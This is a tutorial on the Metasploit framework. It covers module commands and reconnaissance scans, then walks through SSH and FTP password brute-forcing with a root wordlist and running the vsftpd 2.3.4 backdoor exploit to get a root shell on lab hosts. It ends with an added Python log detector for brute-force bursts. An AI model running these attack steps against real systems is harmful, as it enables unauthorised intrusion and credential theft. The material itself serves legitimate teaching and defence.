Directory
1. Introduction to Metasploit Penetration Testing Framework
1. Metasploit framework
2. Metasploit directory structure
2. Basic usage of Metasploit
1. The connect command in the core command
2. How to use module-related commands show
3. How to use the module-related command search search
4. How to use the module-related command use
5. How to use the module-related command info
3. Information collection for Metasploit penetration testing
1. Collect host information based on tcp protocol
(1) Use nmap and arp_sweep in Metasploit to collect host information
(2) Use half-open (SYN) mode to scan TCP ports
2. Collect host information based on SNMP protocol
3. Collect information based on SMB protocol
(1) Use smb_version to scan the version number based on the SMB protocol
(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol
(3) Use smb_lookupsid to scan system user information (SID enumeration)
4. Collect information based on SSH protocol
(1) View the version information of the ssh service
(2) Brute force cracking of SSH
5. Collect information based on FTP protocol
(1) View the version information of the ftp service
(2) FTP anonymous login scan
(3) FTP brute force cracking
1. Introduction to Metasploit Penetration Testing Framework
1. Metasploit system framework
1. Basic library: the Metasploit basic library files are located in the libraries directory under the root path of the source code and consist of three parts: Rex, framework-core and framework-base.
Rex is the most basic component that the whole framework depends on. It provides wrapped network sockets, client and server implementations of network application protocols, the logging subsystem, support routines for penetration attacks, PostgreSQL and MySQL database support, and so on.
The framework-core library implements all the interfaces for interacting with the various types of upper-level modules and plug-ins.
The framework-base library extends framework-core, providing simpler wrapper routines and support for the different parts of the framework, plus functional classes that let user interfaces and utility programs call the framework's own functions and integrated modules.
2. Modules: modules are divided into 6 types according to their purpose: auxiliary modules (Aux), penetration attack modules (Exploits), post-penetration attack modules (Post), attack payload modules (Payloads), encoder modules (Encoders) and empty instruction modules (Nops).
Note: a payload is also known as an attack payload. It is mainly used to establish a stable connection between the target machine and the attack machine; it can return a shell and perform program injection.
3. Plug-ins: Plug-ins can extend the functions of the framework, or assemble components with existing functions to form advanced features. Plug-ins can integrate some existing external security tools, such as Nessus, OpenVAS vulnerability scanner, etc., to provide some new functions for the user interface.
4. Interfaces: including the msfconsole control terminal, the msfcli command line, the msfgui graphical interface, the Armitage graphical interface and the msfapi remote call interface.
5. Functional programs: Metasploit also provides a series of functional programs that can be run directly, letting penetration testers and security personnel quickly use the internal capabilities of the Metasploit framework to complete specific tasks. For example, msfpayload, msfencode and msfvenom can package an attack payload as an executable file, C code, JavaScript code and other forms, and can apply various types of encoding.
2. Metasploit directory structure
Change to the Metasploit working directory
data: Editable files used by Metasploit
documentation: Provides documentation for the framework
lib: framework code library
modules: the actual MSF modules
plugins: Plugins that can be loaded at runtime
scripts: Meterpreter and other scripts
tools: various useful command-line tools
2. Basic usage of Metasploit
Metasploit Basic Commands
The Metasploit program requires a PostgreSQL database.
PostgreSQL overview:
PostgreSQL is a free-software object-relational database management system (ORDBMS) with very complete features. It is based on POSTGRES version 4.2, developed by the Computer Department of State University.
Extension: differences between the application scenarios of PostgreSQL and MySQL:
In terms of application scenarios, PostgreSQL is better suited to strict enterprise applications (such as finance, telecommunications, ERP and CRM), while MySQL is better suited to Internet scenarios with relatively simple business logic and lower data reliability requirements.
Start the database manually:
┌──(rootkali)-[~]
└─# systemctl start postgresql
┌──(rootkali)-[~]
└─# systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.
There are two ways to start Metasploit.
The first is to click the icon.
The second is to use the terminal command:
└─# msfdb run
After startup completes, some statistics are displayed, such as the version number and the number of exploits, payloads and so on.
msf6 > help # View help information.
Note: Viewing the help gives an overall picture of msf; the msf commands are divided into the following types:
Core Commands #core command
Module Commands #module command
Job Commands #background task command
Resource Script Commands #Resource script command
Database Backend Commands #Database backend command
Credentials Backend Commands #Certificate/credential backend command
Developer Commands #Developer Commands
The commonly used commands are explained below.
1. The connect command in the core commands
The connect command is mainly used to connect to a remote host and is generally used in intranet penetration. A common form is "connect 192.168.1.1 80", where 192.168.1.1 is the IP address and 80 is the port number.
2. How to use the module-related command show
The show command is used a lot.
Valid parameters for the show command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options
Example 1: List all penetration attack modules (exploits) in the Metasploit framework.
msf6 > show exploits # List all penetration attack modules in the Metasploit framework. This command lists a lot of data and takes longer.
msf6 > show payloads # List all attack payloads in the Metasploit framework.
msf6 > show auxiliary # List all auxiliary modules in the Metasploit framework.
3. How to use the module-related command search
When you use msfconsole you will work with all kinds of vulnerability modules, plug-ins and so on, so the search command is very important.
Typing search -h lists the options of the search command.
msf6 > search -h
Usage: search [ options ]
Example 1: Search by name keyword
Here you need to use the name: keyword.
msf5 > search mysql # The text following search is the content to search for; this kind of search is very broad. Use this method only when you know the vulnerability name clearly.
Example: first find the ms08_067 vulnerability module you want.
msf6 > search ms08_067
Syntax: search keyword:value
For example, msf6 > search name:mysql # finds vulnerabilities in the mysql database
Each exploit module is marked with a Rank field based on its potential impact on the target system. Users can search, classify and sort exploit modules by Rank.
Ranks in descending order of reliability:
excellent
The exploit will never crash the target service; examples are SQL injection, command execution, remote file inclusion, local file inclusion and the like. Typical memory corruption exploits cannot be rated at this level unless there are special circumstances.
great
The exploit has a default target and either auto-detects the appropriate target, or uses a specific return address after a version check of the service.
good
The exploit has a default target and represents the "common case" for this type of software (e.g. Windows 7, Server 2012, etc.).
normal
The exploit is reliable but version-specific, and cannot (or does not) reliably auto-detect the target.
average
The exploit is unreliable or difficult to exploit.
low
The exploit is nearly impossible (or less than 50% successful) on common platforms.
manual
The exploit is unstable or difficult to exploit and is essentially denial of service (DoS) based. A module is also rated at this level if it is only used when the user specifically configures it and is not used otherwise.
Example 2: Find by path
Sometimes we only remember the path of a module but forget its name. The path: keyword then finds all modules under that path. To list all mysql modules under the mysql path, enter:
msf6 > search path:mysql
Example 3: Narrowing your query
Keyword: platform
Function: modules affecting this platform, that is, it lists the modules that can affect the given platform.
Sometimes a search returns a large number of modules; the platform: keyword narrows the scope of the query. After using the platform keyword, the query results list the modules with higher rank. To find mysql vulnerabilities, enter:
msf6 > search platform:mysql
Example 4: Find by type
The type: keyword is used here.
type : specific type of module (exploit, payload, auxiliary, encoder, evasion, post, or nop)
To search for exploit modules, type:
msf6 > search type:exploit
Example 5: Combined lookup
The above keywords can be combined as needed. To find exploit modules related to mysql, type:
msf6 > search name:mysql type:exploit
4. How to use the module-related command use
The use command loads a module. If you want to use a module, run the use command.
Syntax: use <module name>
5. How to use the module-related command info
info: displays information about a module.
Method 1: info <module name>
In the displayed information, the things to focus on are:
(1) Available targets: shows which operating systems can be attacked
(2) Basic options: the parameters required to invoke the vulnerability
(3) Vulnerability description and execution process
(4) Reference documents
Method 2: Use the show command to view information about the module
msf6 exploit(windows/smb/ms08_067_netapi) > show options # View module options
msf6 exploit(windows/smb/ms08_067_netapi) > show targets # Check which operating systems can be attacked
Set the RHOSTS parameter to specify the target machine of the attack:
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.109
msf6 exploit(windows/smb/ms08_067_netapi) > show options # View the set value
After configuration is complete, execute the module by typing exploit or run.
msf6 exploit(windows/smb/ms08_067_netapi) > back # Use back to exit the loaded module
Note: Do not use exit; exit quits the Metasploit program entirely.
3. Information collection for Metasploit penetration testing
1. Collect host information based on tcp protocol
(1) Use nmap and arp_sweep in Metasploit to collect host information
Metasploit also integrates the Nmap tool.
ARP scanning:
msf6 > use auxiliary/scanner/discovery/arp_sweep
Check which parameters the module needs to configure:
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
Configure RHOSTS (the target network to scan):
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
SHOST and SMAC are used to spoof the source IP and MAC addresses.
Configure the number of threads:
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 30
msf6 auxiliary(scanner/discovery/arp_sweep) > run
msf6 auxiliary(scanner/discovery/arp_sweep) > back # Exit the module
(2) Use half-open (SYN) mode to scan TCP ports
msf6 > search portscan
2. Collect host information based on SNMP protocol
Simple Network Management Protocol (SNMP) is a set of network management standards consisting of an application layer protocol, a database schema and a group of resource objects. The protocol allows network management systems to monitor devices connected to the network for any conditions that warrant administrative attention.
Practice: use the snmp_enum module to scan target server information over SNMP
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > show options
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.180
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Note: A lot of information is detected through SNMP, such as the server's hardware information and the processes currently running on it; these two kinds of information cannot be obtained by the other scanning methods.
3. Collect information based on SMB protocol
SMB overview: Server Message Block (SMB), also known as the network file sharing system Common Internet File System (CIFS), is an application-layer network transmission protocol developed by Microsoft. Its main function is to let machines on a network share resources such as files, printers, serial ports and communication channels. It was reimplemented by Unix server vendors and can be used to connect Unix servers and Windows clients for tasks such as printing and file sharing.
(1) Use smb_version to scan version number based on SMB protocol
msf6 > use auxiliary/scanner/smb/smb_version
Note: The operating system version number can be scanned, and it is very accurate.
(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol
A user name and password can be configured in most SMB modules, and the scan results of modules configured with a user name and password better meet our needs.
Enumerate Shares
msf6 > use auxiliary/scanner/smb/smb_enumshares
You can see that one is the xuegod shared directory we set up earlier and the other four are hidden shares.
(3) Use smb_lookupsid to scan system user information (SID enumeration)
msf6 > use auxiliary/scanner/smb/smb_lookupsid
4. Collect information based on SSH protocol
(1) View the version information of the ssh service
msf6 > use auxiliary/scanner/ssh/ssh_version
(2) Brute-force SSH
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
5. Collect information based on FTP protocol
(1) View the version information of the ftp service
Load the ftp service version scanning module:
msf6 > use auxiliary/scanner/ftp/ftp_version
The scan result is: vsFTPd 2.3.4
msf6 auxiliary(scanner/ftp/ftp_version) > back
Having scanned the version number of the ftp service, we can search for that version number to see whether any module applies:
msf6 > search 2.3.4
We find an exploit module for a backdoor in this version of the ftp service.
Let's try this module:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
We got a shell, and it has root privileges; we try to run the following command.
Run the id command to view the current user.
(2) FTP anonymous login scan
msf6 > use auxiliary/scanner/ftp/anonymous
(3) FTP brute force cracking
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
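Added example (not part of the original tutorial) showing the defender's view of the ssh_login and ftp_login brute-force runs from sections 4 and 5: a Python detector that parses sshd and vsftpd log lines and flags a source once its failed logins exceed a threshold within a time window. The log lines, addresses, threshold and window are constructed assumptions, not values from the page.

```python
"""Defender-side counterpart to the ssh_login / ftp_login brute-force runs above: flag
sources whose failed logins burst past a threshold within a short time window."""
import re
from collections import defaultdict
from datetime import datetime

# sshd via syslog, e.g. "Jan 12 10:00:01 host sshd[123]: Failed password for root from 192.168.1.5 port 5000 ssh2"
SSHD_FAIL = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
# vsftpd, e.g. 'Tue Jan 12 10:00:01 2021 [pid 99] [root] FAIL LOGIN: Client "192.168.1.5"'
VSFTPD_FAIL = re.compile(r'^(\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(\S+)\] FAIL LOGIN: Client "([^"]+)"')

def parse_failures(lines, syslog_year=2021):
    """Yield (timestamp, service, user, src_ip) per failed login; syslog has no year, so one is assumed."""
    for line in lines:
        if (m := SSHD_FAIL.match(line)):
            ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S").replace(year=syslog_year)
            yield ts, "ssh", m.group(2), m.group(3)
        elif (m := VSFTPD_FAIL.match(line)):
            yield datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y"), "ftp", m.group(2), m.group(3)

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {(src_ip, service): (total_failures, distinct_users)} for each source with
    >= threshold failures inside any window_s-second span (a user:pass wordlist such as
    root_userpass.txt shows up as a burst of failures spread over several user names)."""
    events = defaultdict(list)
    for ts, svc, user, ip in parse_failures(lines):
        events[(ip, svc)].append((ts, user))
    alerts = {}
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over the time-sorted failures
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts[key] = (len(evs), len({u for _, u in evs}))
                break
    return alerts

# Constructed sample: one host guessing SSH and FTP passwords, plus a single benign mistyped login.
SAMPLE_LOG = [
    f"Jan 12 10:00:{s:02d} host sshd[123]: Failed password for {u} from 192.168.1.5 port 5000 ssh2"
    for s, u in zip(range(0, 30, 5), ["root", "admin", "root", "test", "oracle", "root"])
] + ["Jan 12 10:05:00 host sshd[124]: Failed password for alice from 10.0.0.8 port 5001 ssh2"] + [
    f'Tue Jan 12 10:01:{s:02d} 2021 [pid 99] [{u}] FAIL LOGIN: Client "192.168.1.5"'
    for s, u in zip(range(0, 25, 5), ["root", "admin", "ftp", "root", "guest"])
]
```

Calling detect_bruteforce(SAMPLE_LOG) flags 192.168.1.5 for both ssh and ftp while the lone failure from 10.0.0.8 stays below the threshold.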